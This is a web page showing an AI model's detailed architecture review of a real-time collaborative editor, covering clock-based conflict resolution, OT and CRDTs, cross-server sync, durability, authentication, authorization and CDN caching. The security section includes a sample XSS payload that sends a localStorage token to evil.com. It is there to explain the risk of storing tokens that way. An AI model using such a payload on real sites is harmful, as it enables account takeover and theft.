Debug This Architecture

Claude Opus 4 5's response to the 'Debug This Architecture' challenge.

Claude Opus 4.5

February 3, 2026

Text

?
Prompt

Here's the architecture for a real-time collaborative document editor (like Google Docs): **System Overview:** - Frontend: React SPA with WebSocket connections - Backend: Node.js API servers behind a load balancer (round-robin) - Database: PostgreSQL for document storage, Redis for session cache - Real-time: Each API server maintains its own WebSocket connections to clients - Sync Strategy: Last-write-wins with timestamps from client clocks - Storage: Documents saved as full HTML snapshots every 30 seconds - Auth: JWT tokens with 24-hour expiry, stored in localStorage - CDN: CloudFront for static assets, also caches API responses for 5 minutes **Data Flow:** 1. User types → change event sent via WebSocket to their connected server 2. Server writes change to PostgreSQL 3. Server broadcasts change to all WebSocket clients connected to THAT server 4. Other servers poll PostgreSQL every 2 seconds for changes 5. Conflict resolution: if two users edit the same paragraph, last timestamp wins **Scaling Plan:** - Horizontal scaling by adding more API servers - Database read replicas for read-heavy operations - Document partitioning by organization ID Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.

Response

Claude Opus 4.5Debug This Architecture

Claude Opus 4.5

Comprehensive Architecture Review: Real-time Collaborative Document Editor

This architecture has several critical issues that will cause data loss, poor user experience, and scaling problems. Let me analyze each systematically.

1. Critical Data Consistency Issues

Issue 1.1: Client Clock-Based Timestamps (Last-Write-Wins)

The Problem: Using client clocks for conflict resolution is fundamentally broken. Client clocks can be wrong by hours, days, or even years.

Timeline (Server Time):
10:00:00 - Alice types "Hello" (Alice's clock says 15:00:00)
10:00:01 - Bob types "World" (Bob's clock says 09:00:00)

Result: Alice's edit wins because 15:00:00 > 09:00:00
Bob's edit is silently discarded, even though it came AFTER Alice's

Real-world scenarios that break this:

Mobile devices with dead CMOS batteries
Users in different timezones with misconfigured clocks
VMs with clock drift
Malicious users who set their clock to year 2099 to always "win"

Solution: Hybrid Logical Clocks (HLC) or Server-Assigned Lamport Timestamps

// Hybrid Logical Clock implementation
interface HLC {
  wallTime: number;    // Physical time from server
  logical: number;     // Logical counter for ordering
  nodeId: string;      // Tie-breaker for simultaneous events
}

class HybridLogicalClock {
  private wallTime: number = 0;
  private logical: number = 0;
  private nodeId: string;

  constructor(nodeId: string) {
    this.nodeId = nodeId;
  }

  // Called when sending an event
  tick(): HLC {
    const now = Date.now();
    if (now > this.wallTime) {
      this.wallTime = now;
      this.logical = 0;
    } else {
      this.logical++;
    }
    return { wallTime: this.wallTime, logical: this.logical, nodeId: this.nodeId };
  }

  // Called when receiving an event
  receive(remote: HLC): HLC {
    const now = Date.now();
    if (now > this.wallTime && now > remote.wallTime) {
      this.wallTime = now;
      this.logical = 0;
    } else if (this.wallTime > remote.wallTime) {
      this.logical++;
    } else if (remote.wallTime > this.wallTime) {
      this.wallTime = remote.wallTime;
      this.logical = remote.logical + 1;
    } else {
      // Equal wall times
      this.logical = Math.max(this.logical, remote.logical) + 1;
    }
    return { wallTime: this.wallTime, logical: this.logical, nodeId: this.nodeId };
  }

  // Compare two HLCs
  static compare(a: HLC, b: HLC): number {
    if (a.wallTime !== b.wallTime) return a.wallTime - b.wallTime;
    if (a.logical !== b.logical) return a.logical - b.logical;
    return a.nodeId.localeCompare(b.nodeId);
  }
}

Trade-offs:

Approach	Pros	Cons
HLC	Preserves causality, tolerates clock drift	Slightly more complex, ~24 bytes per timestamp
Server timestamps only	Simple	Doesn't capture happens-before relationships
Vector clocks	Perfect causality tracking	O(n) space where n = number of clients

Issue 1.2: Paragraph-Level Last-Write-Wins Destroys Work

The Problem: When two users edit the same paragraph, one user's work is completely discarded.

Original paragraph: "The quick brown fox"

Alice (10:00:00): Changes to "The quick brown fox jumps"
Bob   (10:00:01): Changes to "The slow brown fox"

Result: "The slow brown fox"
Alice's addition of "jumps" is silently lost

Solution: Operational Transformation (OT) or CRDTs

For a Google Docs-like experience, OT is the industry standard:

// Operational Transformation for text
type Operation = 
  | { type: 'retain'; count: number }
  | { type: 'insert'; text: string }
  | { type: 'delete'; count: number };

class OTDocument {
  private content: string = '';
  private revision: number = 0;

  // Transform operation A against operation B
  // Returns A' such that apply(apply(doc, B), A') === apply(apply(doc, A), B')
  static transform(a: Operation[], b: Operation[]): [Operation[], Operation[]] {
    const aPrime: Operation[] = [];
    const bPrime: Operation[] = [];
    
    let indexA = 0, indexB = 0;
    let opA = a[indexA], opB = b[indexB];

    while (opA || opB) {
      // Insert operations go first
      if (opA?.type === 'insert') {
        aPrime.push(opA);
        bPrime.push({ type: 'retain', count: opA.text.length });
        opA = a[++indexA];
        continue;
      }
      if (opB?.type === 'insert') {
        bPrime.push(opB);
        aPrime.push({ type: 'retain', count: opB.text.length });
        opB = b[++indexB];
        continue;
      }

      // Both are retain or delete - handle based on lengths
      // ... (full implementation would handle all cases)
    }

    return [aPrime, bPrime];
  }

  // Apply operation to document
  apply(ops: Operation[]): void {
    let index = 0;
    let newContent = '';

    for (const op of ops) {
      switch (op.type) {
        case 'retain':
          newContent += this.content.slice(index, index + op.count);
          index += op.count;
          break;
        case 'insert':
          newContent += op.text;
          break;
        case 'delete':
          index += op.count;
          break;
      }
    }
    newContent += this.content.slice(index);
    this.content = newContent;
    this.revision++;
  }
}

// Server-side OT handling
class OTServer {
  private document: OTDocument;
  private history: Operation[][] = [];

  receiveOperation(clientRevision: number, ops: Operation[]): Operation[] {
    // Transform against all operations that happened since client's revision
    let transformedOps = ops;
    
    for (let i = clientRevision; i < this.history.length; i++) {
      const [newOps] = OTDocument.transform(transformedOps, this.history[i]);
      transformedOps = newOps;
    }

    this.document.apply(transformedOps);
    this.history.push(transformedOps);
    
    return transformedOps;
  }
}

Alternative: CRDTs (Conflict-free Replicated Data Types)

// Simplified RGA (Replicated Growable Array) CRDT for text
interface RGANode {
  id: { timestamp: HLC; nodeId: string };
  char: string | null;  // null = tombstone (deleted)
  parent: RGANode['id'] | null;
}

class RGADocument {
  private nodes: Map<string, RGANode> = new Map();
  private clock: HybridLogicalClock;

  constructor(nodeId: string) {
    this.clock = new HybridLogicalClock(nodeId);
  }

  insert(position: number, char: string): RGANode {
    const parentId = this.getNodeAtPosition(position - 1)?.id ?? null;
    const node: RGANode = {
      id: { timestamp: this.clock.tick(), nodeId: this.clock['nodeId'] },
      char,
      parent: parentId
    };
    this.nodes.set(this.nodeIdToString(node.id), node);
    return node;
  }

  delete(position: number): void {
    const node = this.getNodeAtPosition(position);
    if (node) node.char = null;  // Tombstone
  }

  merge(remoteNode: RGANode): void {
    const key = this.nodeIdToString(remoteNode.id);
    if (!this.nodes.has(key)) {
      this.nodes.set(key, remoteNode);
      this.clock.receive(remoteNode.id.timestamp);
    }
  }

  getText(): string {
    return this.getOrderedNodes()
      .filter(n => n.char !== null)
      .map(n => n.char)
      .join('');
  }

  private nodeIdToString(id: RGANode['id']): string {
    return `${id.timestamp.wallTime}-${id.timestamp.logical}-${id.nodeId}`;
  }

  private getOrderedNodes(): RGANode[] {
    // Topological sort based on parent relationships
    // with timestamp as tie-breaker
    // ... implementation
  }
}

Trade-offs:

Approach	Pros	Cons
OT	Compact operations, well-understood	Requires central server for ordering, complex transform functions
CRDT	Decentralized, works offline	Larger metadata overhead, tombstones accumulate
Last-write-wins	Simple	Loses data

Recommendation: Use OT for real-time sync (like Google Docs does) with CRDT for offline support.

2. Real-time Synchronization Failures

Issue 2.1: Cross-Server WebSocket Isolation

The Problem: With round-robin load balancing, users on the same document connect to different servers. Changes only broadcast to clients on the SAME server.

Document: "Project Proposal"

Server A:                    Server B:
├── Alice (editing)          ├── Bob (editing)
└── Charlie (viewing)        └── Diana (viewing)

Alice types "Hello" → Charlie sees it immediately
                   → Bob and Diana wait up to 2 seconds (polling interval)

This creates a jarring, inconsistent experience where some users see real-time updates and others see delayed updates.

Solution: Redis Pub/Sub for Cross-Server Broadcasting

import Redis from 'ioredis';
import { WebSocket } from 'ws';

class DocumentSyncService {
  private redisPub: Redis;
  private redisSub: Redis;
  private localClients: Map<string, Set<WebSocket>> = new Map();
  private serverId: string;

  constructor() {
    this.serverId = crypto.randomUUID();
    this.redisPub = new Redis(process.env.REDIS_URL);
    this.redisSub = new Redis(process.env.REDIS_URL);
    
    this.setupSubscriptions();
  }

  private setupSubscriptions(): void {
    this.redisSub.psubscribe('doc:*', (err) => {
      if (err) console.error('Failed to subscribe:', err);
    });

    this.redisSub.on('pmessage', (pattern, channel, message) => {
      const documentId = channel.replace('doc:', '');
      const parsed = JSON.parse(message);
      
      // Don't re-broadcast our own messages
      if (parsed.serverId === this.serverId) return;
      
      this.broadcastToLocalClients(documentId, parsed.payload);
    });
  }

  async publishChange(documentId: string, change: DocumentChange): Promise<void> {
    const message = JSON.stringify({
      serverId: this.serverId,
      payload: change,
      timestamp: Date.now()
    });

    // Publish to Redis for other servers
    await this.redisPub.publish(`doc:${documentId}`, message);
    
    // Also broadcast to local clients
    this.broadcastToLocalClients(documentId, change);
  }

  private broadcastToLocalClients(documentId: string, change: DocumentChange): void {
    const clients = this.localClients.get(documentId);
    if (!clients) return;

    const message = JSON.stringify(change);
    for (const client of clients) {
      if (client.readyState === WebSocket.OPEN) {
        client.send(message);
      }
    }
  }

  registerClient(documentId: string, ws: WebSocket): void {
    if (!this.localClients.has(documentId)) {
      this.localClients.set(documentId, new Set());
    }
    this.localClients.get(documentId)!.add(ws);

    ws.on('close', () => {
      this.localClients.get(documentId)?.delete(ws);
    });
  }
}

Alternative: Sticky Sessions with Consistent Hashing

// Nginx configuration for sticky sessions based on document ID
/*
upstream api_servers {
    hash $arg_documentId consistent;
    server api1:3000;
    server api2:3000;
    server api3:3000;
}
*/

// Or implement in application load balancer
class DocumentAwareLoadBalancer {
  private servers: string[];
  private hashRing: ConsistentHashRing;

  constructor(servers: string[]) {
    this.servers = servers;
    this.hashRing = new ConsistentHashRing(servers, 150); // 150 virtual nodes
  }

  getServerForDocument(documentId: string): string {
    return this.hashRing.getNode(documentId);
  }

  // Handle server failures gracefully
  removeServer(server: string): void {
    this.hashRing.removeNode(server);
    // Clients will reconnect and get routed to new server
  }
}

Trade-offs:

Approach	Pros	Cons
Redis Pub/Sub	Decoupled servers, any server can handle any doc	Additional infrastructure, Redis becomes SPOF
Sticky sessions	Simpler, no cross-server communication	Uneven load, complex failover
Dedicated doc servers	Best performance per document	Complex routing, underutilization

Issue 2.2: 2-Second Polling Creates Unacceptable Latency

The Problem: Even with Redis Pub/Sub, the architecture mentions polling PostgreSQL every 2 seconds as a fallback. This creates:

Up to 2 seconds of latency for changes
Unnecessary database load
Poor user experience for collaboration

Solution: Event-Driven Architecture with PostgreSQL LISTEN/NOTIFY

import { Pool, Client } from 'pg';

class PostgresChangeNotifier {
  private listenerClient: Client;
  private pool: Pool;
  private handlers: Map<string, Set<(change: any) => void>> = new Map();

  async initialize(): Promise<void> {
    this.listenerClient = new Client(process.env.DATABASE_URL);
    await this.listenerClient.connect();
    
    await this.listenerClient.query('LISTEN document_changes');
    
    this.listenerClient.on('notification', (msg) => {
      if (msg.channel === 'document_changes' && msg.payload) {
        const change = JSON.parse(msg.payload);
        this.notifyHandlers(change.document_id, change);
      }
    });
  }

  subscribe(documentId: string, handler: (change: any) => void): () => void {
    if (!this.handlers.has(documentId)) {
      this.handlers.set(documentId, new Set());
    }
    this.handlers.get(documentId)!.add(handler);

    // Return unsubscribe function
    return () => {
      this.handlers.get(documentId)?.delete(handler);
    };
  }

  private notifyHandlers(documentId: string, change: any): void {
    const handlers = this.handlers.get(documentId);
    if (handlers) {
      for (const handler of handlers) {
        handler(change);
      }
    }
  }
}

// Database trigger to send notifications
/*
CREATE OR REPLACE FUNCTION notify_document_change()
RETURNS TRIGGER AS $$
BEGIN
  PERFORM pg_notify(
    'document_changes',
    json_build_object(
      'document_id', NEW.document_id,
      'operation_id', NEW.id,
      'operation', NEW.operation,
      'revision', NEW.revision
    )::text
  );
  RETURN NEW;
END;
$$ LANGUAGE plpgsql;

CREATE TRIGGER document_change_trigger
AFTER INSERT ON document_operations
FOR EACH ROW EXECUTE FUNCTION notify_document_change();
*/

3. Data Storage and Durability Issues

Issue 3.1: 30-Second Snapshot Interval Causes Data Loss

The Problem: If a server crashes, up to 30 seconds of work is lost. For a real-time editor, this is catastrophic.

Timeline:
00:00 - Snapshot saved
00:15 - Alice types 500 words
00:29 - Server crashes
00:30 - Server restarts

Result: Alice's 500 words are gone forever

Solution: Operation Log with Periodic Compaction

interface DocumentOperation {
  id: string;
  documentId: string;
  userId: string;
  revision: number;
  operation: Operation[];  // OT operations
  timestamp: HLC;
  checksum: string;
}

class DurableDocumentStore {
  private pool: Pool;
  private redis: Redis;

  async applyOperation(op: DocumentOperation): Promise<void> {
    const client = await this.pool.connect();
    
    try {
      await client.query('BEGIN');

      // 1. Append to operation log (durable)
      await client.query(`
        INSERT INTO document_operations 
        (id, document_id, user_id, revision, operation, timestamp, checksum)
        VALUES ($1, $2, $3, $4, $5, $6, $7)
      `, [op.id, op.documentId, op.userId, op.revision, 
          JSON.stringify(op.operation), op.timestamp, op.checksum]);

      // 2. Update materialized view (for fast reads)
      await client.query(`
        UPDATE documents 
        SET current_revision = $1, 
            last_modified = NOW(),
            content = apply_operation(content, $2)
        WHERE id = $3 AND current_revision = $4
      `, [op.revision, JSON.stringify(op.operation), op.documentId, op.revision - 1]);

      await client.query('COMMIT');

      // 3. Cache in Redis for real-time sync
      await this.redis.xadd(
        `doc:${op.documentId}:ops`,
        'MAXLEN', '~', '10000',  // Keep last ~10k operations
        '*',
        'data', JSON.stringify(op)
      );

    } catch (error) {
      await client.query('ROLLBACK');
      throw error;
    } finally {
      client.release();
    }
  }

  // Periodic compaction job
  async compactDocument(documentId: string): Promise<void> {
    const client = await this.pool.connect();
    
    try {
      await client.query('BEGIN');

      // Get current state
      const { rows: [doc] } = await client.query(
        'SELECT content, current_revision FROM documents WHERE id = $1 FOR UPDATE',
        [documentId]
      );

      // Create snapshot
      await client.query(`
        INSERT INTO document_snapshots (document_id, revision, content, created_at)
        VALUES ($1, $2, $3, NOW())
      `, [documentId, doc.current_revision, doc.content]);

      // Delete old operations (keep last 1000 for undo history)
      await client.query(`
        DELETE FROM document_operations 
        WHERE document_id = $1 
        AND revision < $2 - 1000
      `, [documentId, doc.current_revision]);

      await client.query('COMMIT');
    } finally {
      client.release();
    }
  }

  // Recover document from operations
  async recoverDocument(documentId: string): Promise<string> {
    // Find latest snapshot
    const { rows: [snapshot] } = await this.pool.query(`
      SELECT content, revision FROM document_snapshots 
      WHERE document_id = $1 
      ORDER BY revision DESC LIMIT 1
    `, [documentId]);

    let content = snapshot?.content ?? '';
    let fromRevision = snapshot?.revision ?? 0;

    // Apply all operations since snapshot
    const { rows: operations } = await this.pool.query(`
      SELECT operation FROM document_operations 
      WHERE document_id = $1 AND revision > $2
      ORDER BY revision ASC
    `, [documentId, fromRevision]);

    for (const op of operations) {
      content = applyOperation(content, JSON.parse(op.operation));
    }

    return content;
  }
}

Database Schema:

-- Immutable operation log
CREATE TABLE document_operations (
    id UUID PRIMARY KEY,
    document_id UUID NOT NULL REFERENCES documents(id),
    user_id UUID NOT NULL REFERENCES users(id),
    revision BIGINT NOT NULL,
    operation JSONB NOT NULL,
    timestamp JSONB NOT NULL,  -- HLC
    checksum VARCHAR(64) NOT NULL,
    created_at TIMESTAMPTZ DEFAULT NOW(),
    
    UNIQUE(document_id, revision)
);

-- Index for efficient replay
CREATE INDEX idx_doc_ops_replay 
ON document_operations(document_id, revision);

-- Periodic snapshots for fast recovery
CREATE TABLE document_snapshots (
    id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
    document_id UUID NOT NULL REFERENCES documents(id),
    revision BIGINT NOT NULL,
    content TEXT NOT NULL,
    created_at TIMESTAMPTZ DEFAULT NOW(),
    
    UNIQUE(document_id, revision)
);

-- Materialized current state (for fast reads)
CREATE TABLE documents (
    id UUID PRIMARY KEY,
    title VARCHAR(500),
    content TEXT,
    current_revision BIGINT DEFAULT 0,
    created_at TIMESTAMPTZ DEFAULT NOW(),
    last_modified TIMESTAMPTZ DEFAULT NOW()
);

Trade-offs:

Approach	Pros	Cons
Operation log	Zero data loss, full history	Storage grows, need compaction
Frequent snapshots	Simple recovery	Still some data loss window
Write-ahead log	Database handles durability	Tied to specific database

Issue 3.2: Full HTML Snapshots Are Inefficient and Dangerous

The Problem:

Storage bloat: A 10KB document with 1000 edits = 10MB of snapshots
XSS vulnerabilities: Storing raw HTML allows script injection
Format lock-in: Can't easily migrate to different rendering

Solution: Structured Document Model with Delta Storage

// Structured document model (similar to ProseMirror/Slate)
interface DocumentNode {
  type: 'doc' | 'paragraph' | 'heading' | 'list' | 'listItem' | 'text';
  content?: DocumentNode[];
  text?: string;
  marks?: Mark[];  // bold, italic, link, etc.
  attrs?: Record<string, any>;
}

interface Mark {
  type: 'bold' | 'italic' | 'underline' | 'link' | 'code';
  attrs?: Record<string, any>;
}

// Example document
const exampleDoc: DocumentNode = {
  type: 'doc',
  content: [
    {
      type: 'heading',
      attrs: { level: 1 },
      content: [{ type: 'text', text: 'My Document' }]
    },
    {
      type: 'paragraph',
      content: [
        { type: 'text', text: 'Hello ' },
        { type: 'text', text: 'world', marks: [{ type: 'bold' }] }
      ]
    }
  ]
};

// Sanitization on input
class DocumentSanitizer {
  private allowedNodeTypes = new Set([
    'doc', 'paragraph', 'heading', 'list', 'listItem', 'text',
    'blockquote', 'codeBlock', 'image', 'table', 'tableRow', 'tableCell'
  ]);
  
  private allowedMarks = new Set([
    'bold', 'italic', 'underline', 'strike', 'code', 'link'
  ]);

  sanitize(node: DocumentNode): DocumentNode {
    if (!this.allowedNodeTypes.has(node.type)) {
      // Convert unknown types to paragraph
      return { type: 'paragraph', content: this.sanitizeContent(node.content) };
    }

    return {
      type: node.type,
      ...(node.text && { text: this.sanitizeText(node.text) }),
      ...(node.content && { content: this.sanitizeContent(node.content) }),
      ...(node.marks && { marks: this.sanitizeMarks(node.marks) }),
      ...(node.attrs && { attrs: this.sanitizeAttrs(node.type, node.attrs) })
    };
  }

  private sanitizeText(text: string): string {
    // Remove any potential script injections
    return text.replace(/<[^>]*>/g, '');
  }

  private sanitizeMarks(marks: Mark[]): Mark[] {
    return marks.filter(m => this.allowedMarks.has(m.type));
  }

  private sanitizeAttrs(nodeType: string, attrs: Record<string, any>): Record<string, any> {
    const sanitized: Record<string, any> = {};
    
    switch (nodeType) {
      case 'heading':
        sanitized.level = Math.min(6, Math.max(1, parseInt(attrs.level) || 1));
        break;
      case 'link':
        // Only allow safe URL schemes
        if (attrs.href && /^https?:\/\//.test(attrs.href)) {
          sanitized.href = attrs.href;
        }
        break;
      case 'image':
        if (attrs.src && /^https?:\/\//.test(attrs.src)) {
          sanitized.src = attrs.src;
          sanitized.alt = String(attrs.alt || '').slice(0, 500);
        }
        break;
    }
    
    return sanitized;
  }
}

// Render to HTML only on output
class DocumentRenderer {
  render(node: DocumentNode): string {
    switch (node.type) {
      case 'doc':
        return node.content?.map(n => this.render(n)).join('') ?? '';
      
      case 'paragraph':
        return `<p>${this.renderContent(node)}</p>`;
      
      case 'heading':
        const level = node.attrs?.level ?? 1;
        return `<h${level}>${this.renderContent(node)}</h${level}>`;
      
      case 'text':
        let text = this.escapeHtml(node.text ?? '');
        for (const mark of node.marks ?? []) {
          text = this.applyMark(text, mark);
        }
        return text;
      
      default:
        return this.renderContent(node);
    }
  }

  private escapeHtml(text: string): string {
    return text
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&quot;');
  }

  private applyMark(text: string, mark: Mark): string {
    switch (mark.type) {
      case 'bold': return `<strong>${text}</strong>`;
      case 'italic': return `<em>${text}</em>`;
      case 'code': return `<code>${text}</code>`;
      case 'link': return `<a href="${this.escapeHtml(mark.attrs?.href ?? '')}">${text}</a>`;
      default: return text;
    }
  }
}

4. Security Vulnerabilities

Issue 4.1: JWT in localStorage is Vulnerable to XSS

The Problem: Any XSS vulnerability (from user content, third-party scripts, browser extensions) can steal tokens.

// Attacker's XSS payload
fetch('https://evil.com/steal', {
  method: 'POST',
  body: localStorage.getItem('token')
});
// Attacker now has 24-hour access to victim's account

Solution: HTTP-Only Cookies with Proper Security Flags

// Server-side: Set secure cookies
import { Response } from 'express';

class AuthService {
  setAuthCookies(res: Response, tokens: { accessToken: string; refreshToken: string }): void {
    // Access token - short lived, used for API calls
    res.cookie('access_token', tokens.accessToken, {
      httpOnly: true,           // Not accessible via JavaScript
      secure: true,             // HTTPS only
      sameSite: 'strict',       // CSRF protection
      maxAge: 15 * 60 * 1000,   // 15 minutes
      path: '/api'              // Only sent to API routes
    });

    // Refresh token - longer lived, only sent to refresh endpoint
    res.cookie('refresh_token', tokens.refreshToken, {
      httpOnly: true,
      secure: true,
      sameSite: 'strict',
      maxAge: 7 * 24 * 60 * 60 * 1000,  // 7 days
      path: '/api/auth/refresh'          // Only sent to refresh endpoint
    });

    // CSRF token - readable by JavaScript, verified on state-changing requests
    const csrfToken = crypto.randomBytes(32).toString('hex');
    res.cookie('csrf_token', csrfToken, {
      httpOnly: false,  // Readable by JavaScript
      secure: true,
      sameSite: 'strict',
      maxAge: 15 * 60 * 1000
    });
  }
}

// Middleware to verify CSRF token
function csrfProtection(req: Request, res: Response, next: NextFunction): void {
  if (['POST', 'PUT', 'DELETE', 'PATCH'].includes(req.method)) {
    const cookieToken = req.cookies.csrf_token;
    const headerToken = req.headers['x-csrf-token'];
    
    if (!cookieToken || !headerToken || cookieToken !== headerToken) {
      return res.status(403).json({ error: 'Invalid CSRF token' });
    }
  }
  next();
}

// Client-side: Include CSRF token in requests
class ApiClient {
  private getCsrfToken(): string {
    return document.cookie
      .split('; ')
      .find(row => row.startsWith('csrf_token='))
      ?.split('=')[1] ?? '';
  }

  async request(url: string, options: RequestInit = {}): Promise<Response> {
    return fetch(url, {
      ...options,
      credentials: 'include',  // Include cookies
      headers: {
        ...options.headers,
        'X-CSRF-Token': this.getCsrfToken()
      }
    });
  }
}

WebSocket Authentication:

// WebSocket connections need special handling since they don't send cookies automatically
class SecureWebSocketServer {
  handleUpgrade(request: IncomingMessage, socket: Socket, head: Buffer): void {
    // Option 1: Verify cookie on upgrade
    const cookies = this.parseCookies(request.headers.cookie ?? '');
    const accessToken = cookies.access_token;
    
    try {
      const payload = this.verifyToken(accessToken);
      
      this.wss.handleUpgrade(request, socket, head, (ws) => {
        (ws as any).userId = payload.userId;
        this.wss.emit('connection', ws, request);
      });
    } catch (error) {
      socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
      socket.destroy();
    }
  }

  // Option 2: Ticket-based authentication
  async generateWebSocketTicket(userId: string): Promise<string> {
    const ticket = crypto.randomBytes(32).toString('hex');
    
    // Store ticket with short expiry
    await this.redis.setex(`ws_ticket:${ticket}`, 30, userId);
    
    return ticket;
  }

  async validateTicket(ticket: string): Promise<string | null> {
    const userId = await this.redis.get(`ws_ticket:${ticket}`);
    if (userId) {
      await this.redis.del(`ws_ticket:${ticket}`);  // One-time use
    }
    return userId;
  }
}

Trade-offs:

Approach	Pros	Cons
HTTP-only cookies	XSS-resistant	Need CSRF protection, more complex
localStorage + fingerprinting	Simpler	Vulnerable to XSS
Session IDs only	Most secure	Requires server-side session store

Issue 4.2: 24-Hour Token Expiry is Too Long

The Problem: If a token is compromised, the attacker has 24 hours of access. For a document editor with sensitive content, this is too risky.

Solution: Short-Lived Access Tokens with Refresh Token Rotation

class TokenService {
  private readonly ACCESS_TOKEN_EXPIRY = '15m';
  private readonly REFRESH_TOKEN_EXPIRY = '7d';

  async generateTokenPair(userId: string): Promise<TokenPair> {
    const tokenFamily = crypto.randomUUID();
    
    const accessToken = jwt.sign(
      { userId, type: 'access' },
      process.env.JWT_SECRET!,
      { expiresIn: this.ACCESS_TOKEN_EXPIRY }
    );

    const refreshToken = jwt.sign(
      { userId, type: 'refresh', family: tokenFamily },
      process.env.JWT_REFRESH_SECRET!,
      { expiresIn: this.REFRESH_TOKEN_EXPIRY }
    );

    // Store refresh token hash for revocation
    await this.redis.setex(
      `refresh:${tokenFamily}`,
      7 * 24 * 60 * 60,
      JSON.stringify({
        userId,
        tokenHash: this.hashToken(refreshToken),
        createdAt: Date.now()
      })
    );

    return { accessToken, refreshToken };
  }

  async refreshTokens(refreshToken: string): Promise<TokenPair | null> {
    try {
      const payload = jwt.verify(refreshToken, process.env.JWT_REFRESH_SECRET!) as any;
      
      // Check if token family is still valid
      const storedData = await this.redis.get(`refresh:${payload.family}`);
      if (!storedData) {
        // Token family was revoked - possible token theft!
        await this.revokeAllUserSessions(payload.userId);
        return null;
      }

      const stored = JSON.parse(storedData);
      
      // Verify token hash matches
      if (stored.tokenHash !== this.hashToken(refreshToken)) {
        // Token reuse detected - revoke family
        await this.redis.del(`refresh:${payload.family}`);
        await this.revokeAllUserSessions(payload.userId);
        return null;
      }

      // Generate new token pair (rotation)
      const newTokens = await this.generateTokenPair(payload.userId);
      
      // Invalidate old family
      await this.redis.del(`refresh:${payload.family}`);

      return newTokens;
    } catch (error) {
      return null;
    }
  }

  private hashToken(token: string): string {
    return crypto.createHash('sha256').update(token).digest('hex');
  }

  async revokeAllUserSessions(userId: string): Promise<void> {
    // In production, use a more efficient approach with user-specific key patterns
    const keys = await this.redis.keys('refresh:*');
    for (const key of keys) {
      const data = await this.redis.get(key);
      if (data && JSON.parse(data).userId === userId) {
        await this.redis.del(key);
      }
    }
  }
}

Issue 4.3: Missing Document-Level Authorization

The Problem: The architecture doesn't mention access control. Can any authenticated user access any document?

Solution: Document Permission System

enum Permission {
  VIEW = 'view',
  COMMENT = 'comment',
  EDIT = 'edit',
  ADMIN = 'admin'
}

interface DocumentAccess {
  documentId: string;
  principalType: 'user' | 'group' | 'organization' | 'public';
  principalId: string | null;  // null for public
  permission: Permission;
}

class DocumentAuthorizationService {
  private cache: Redis;
  private pool: Pool;

  async checkPermission(
    userId: string,
    documentId: string,
    requiredPermission: Permission
  ): Promise<boolean> {
    // Check cache first
    const cacheKey = `authz:${userId}:${documentId}`;
    const cached = await this.cache.get(cacheKey);
    
    if (cached) {
      return this.permissionSatisfies(cached as Permission, requiredPermission);
    }

    // Query database
    const effectivePermission = await this.getEffectivePermission(userId, documentId);
    
    // Cache for 5 minutes
    if (effectivePermission) {
      await this.cache.setex(cacheKey, 300, effectivePermission);
    }

    return this.permissionSatisfies(effectivePermission, requiredPermission);
  }

  private async getEffectivePermission(
    userId: string,
    documentId: string
  ): Promise<Permission | null> {
    const { rows } = await this.pool.query(`
      WITH user_groups AS (
        SELECT group_id FROM group_members WHERE user_id = $1
      ),
      user_org AS (
        SELECT organization_id FROM users WHERE id = $1
      )
      SELECT permission FROM document_access
      WHERE document_id = $2
      AND (
        (principal_type = 'user' AND principal_id = $1)
        OR (principal_type = 'group' AND principal_id IN (SELECT group_id FROM user_groups))
        OR (principal_type = 'organization' AND principal_id = (SELECT organization_id FROM user_org))
        OR (principal_type = 'public')
      )
      ORDER BY 
        CASE permission
          WHEN 'admin' THEN 4
          WHEN 'edit' THEN 3
          WHEN 'comment' THEN 2
          WHEN 'view' THEN 1
        END DESC
      LIMIT 1
    `, [userId, documentId]);

    return rows[0]?.permission ?? null;
  }

  private permissionSatisfies(has: Permission | null, needs: Permission): boolean {
    if (!has) return false;
    
    const hierarchy: Record<Permission, number> = {
      [Permission.VIEW]: 1,
      [Permission.COMMENT]: 2,
      [Permission.EDIT]: 3,
      [Permission.ADMIN]: 4
    };

    return hierarchy[has] >= hierarchy[needs];
  }

  // Invalidate cache when permissions change
  async invalidateDocumentCache(documentId: string): Promise<void> {
    const keys = await this.cache.keys(`authz:*:${documentId}`);
    if (keys.length > 0) {
      await this.cache.del(...keys);
    }
  }
}

// Middleware
function requirePermission(permission: Permission) {
  return async (req: Request, res: Response, next: NextFunction) => {
    const { documentId } = req.params;
    const userId = req.user!.id;

    const hasPermission = await authzService.checkPermission(
      userId,
      documentId,
      permission
    );

    if (!hasPermission) {
      return res.status(403).json({ error: 'Insufficient permissions' });
    }

    next();
  };
}

// Usage
app.get('/api/documents/:documentId', requirePermission(Permission.VIEW), getDocument);
app.put('/api/documents/:documentId', requirePermission(Permission.EDIT), updateDocument);
app.delete('/api/documents/:documentId', requirePermission(Permission.ADMIN), deleteDocument);

5. Caching Catastrophes

Issue 5.1: CDN Caching API Responses for 5 Minutes

The Problem: Caching API responses for collaborative documents is fundamentally broken:

10:00:00 - Alice requests document, CDN caches response
10:00:30 - Bob edits document
10:04:59 - Alice requests document again, gets stale cached version
           Alice sees version from 5 minutes ago!

Solution: Proper Cache Control Headers

class CacheControlMiddleware {
  // Never cache document content or real-time data
  static noCache(req: Request, res: Response, next: NextFunction): void {
    res.set({
      'Cache-Control': 'no-store, no-cache, must-revalidate, proxy-revalidate',
      'Pragma': 'no-cache',
      'Expires': '0',
      'Surrogate-Control': 'no-store'
    });
    next();
  }

  // Cache static assets aggressively
  static staticAssets(req: Request, res: Response, next: NextFunction): void {
    res.set({
      'Cache-Control': 'public, max-age=31536000, immutable'
    });
    next();
  }

  // Cache user-specific data privately with revalidation
  static privateWithRevalidation(maxAge: number) {
    return (req: Request, res: Response, next: NextFunction) => {
      res.set({
        'Cache-Control': `private, max-age=${maxAge}, must-revalidate`,
        'Vary': 'Authorization, Cookie'
      });
      next();
    };
  }

  // Cache public data with ETag validation
  static publicWithEtag(req: Request, res: Response, next: NextFunction): void {
    res.set({
      'Cache-Control': 'public, max-age=0, must-revalidate',
      'Vary': 'Accept-Encoding'
    });
    next();
  }
}

// Apply to routes
app.use('/api/documents/:id/content', CacheControlMiddleware.noCache);
app.use('/api/documents/:id/operations', CacheControlMiddleware.noCache);
